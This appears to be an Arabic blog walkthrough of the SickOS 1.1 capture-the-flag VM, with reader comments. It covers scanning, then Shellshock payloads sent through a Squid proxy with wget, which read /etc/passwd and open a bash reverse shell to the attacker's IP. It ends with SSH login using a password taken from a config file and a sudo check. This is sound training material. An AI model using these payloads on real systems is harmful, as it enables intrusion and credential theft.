مقال : حل تحدي sickos 1.1 من تحديات الـCTF
تقيمك :اليوم سنقوم بأذن الله بحل تحدي أخر من تحديات الـCTF
أولا قم بتحميل ملف الـVM من هنا
أول شئ نستخدم netdiscover لمعرفه الجهاز الهدف
1 |
netdiscover -i eth0 -r 192.168.79.0/24 |
192.168.79.178 هو الهدف
الأن نستخدم أداه nmap لمعرفه المنافذ المفتوحه
1 |
nmap -sV -v -O -A -T5 192.168.79.178 -p- |
يتضح أنه كلا من المنفذ 22 والمنفذ 3218 مفتوح والمنفذ 3218 عليه الخدمه Squid.
وعند فتح مشروع الـMetasploit والبحث عن كلمه Squid وجدت الأتي :
لذلك سنستخدم هذا الموديول الأن في عمل فحص للخدمه
يتضح أن المنفذ 80 مفتوح
ولذلك سنقوم الأن بأستخدام أضافه FoxyProxy الخاصه بالفيرفوكس لأستخدام الجهاز من البورت 3128 كا بروكسي
والأن نقوم بفتح العنوان http://192.168.79.178
والأن سنقوم بأستخدام أداه nikto لفحص الجهاز
1 |
nikto -h localhost -useproxy http://192.168.79.178:3128 |
يتضح أنه مصاب بثغره shellshock ! فلنقم بأختباره
1 |
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status" |
أنها تعمل ومن الواضح أيضا أنه يوجد حساب بأسم sickos
والأن لنجهز شيل عكسي
1 2 |
/bin/bash -i > /dev/tcp/[yourip]/[port] 0<&1 nc -nlvp 4444 |
وفي نافذه أخري
1 |
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status" |
ونحصل علي الشيل
وبعد الدخول علي الجهاز وجدنا ملف مثير للأهتمام var/www/wolfcms/config.php
كما هو واضح كلمه السر هي john@123
والأن ندخل الجهاز من خلال خدمه SSH بأسم المستخدم sickos وكلمه السر john@123
والأن لنتأكد من صلاحياتنا
1 |
sudo -l |
يتضح أنه بصلاحيات Root
المقاله مترجمه من المقاله الأصليه

مجتمع عربي للهاكر الأخلاقي وخبراء الحماية يركّز على مفهوم اختبار الاختراق وجديد أخبار الحماية
التعليقات
hhh
26 ديسمبر، 2016 الساعة 9:12 صاساليب بدائية بالاختراق كل المواقع والاجهزة مقفلة البورتات وعليها جدار حماية يعني فلتر على البورتات
امكن 1 بالمئة بتنجح معهم
مادري متى نرتقي بالمحتوى كلها اساليب غير واقعية
ممكن تشرح لنئ كيف نتخطئ الجدار الناري وكيف اذا البورتات مفلترة
وعلى نظام ويندس 10 او حتى 7
اتحدا الطريقة تنجح
علي الوشلي
2 مارس، 2017 الساعة 1:47 مهذه التحديات الهدف منها ان يكون هناك مقالات تعليميه ولكن بطريقه مختلفه , بدل من اشرح اداه سوف احاول ان اجد تحدي فيه استخدام للاداه بحيث سوف يكون هناك سيناريو كامل,, وفي العاده التحديات يتم تصنيفها على حسب الصعوبه من بسيط , متوسط ومتقدم
حاول ان تنزل بشكل عشوائي احد الاجهزه وقم باختباره سوف تلاحظ ان هناك بعض الوقت يجب ان تستغرقه في التفكير والتوصل للاستغلال
المشكله الكل يقرا الحل قبل المحاوله
John
28 فبراير، 2017 الساعة 5:43 مهذا الشرح هو لتحدي SickOS وليس لتحدي CSharp VulJson. نرجو التأكد قبل نشر المنشورات.
علي الوشلي
2 مارس، 2017 الساعة 1:45 منعم معاك حق , كان هناك خطا بالرابط بسبب ان الموضوع الاصلي ايضا كان الرابط فيه خطا , شكرا لتنبيهك لنا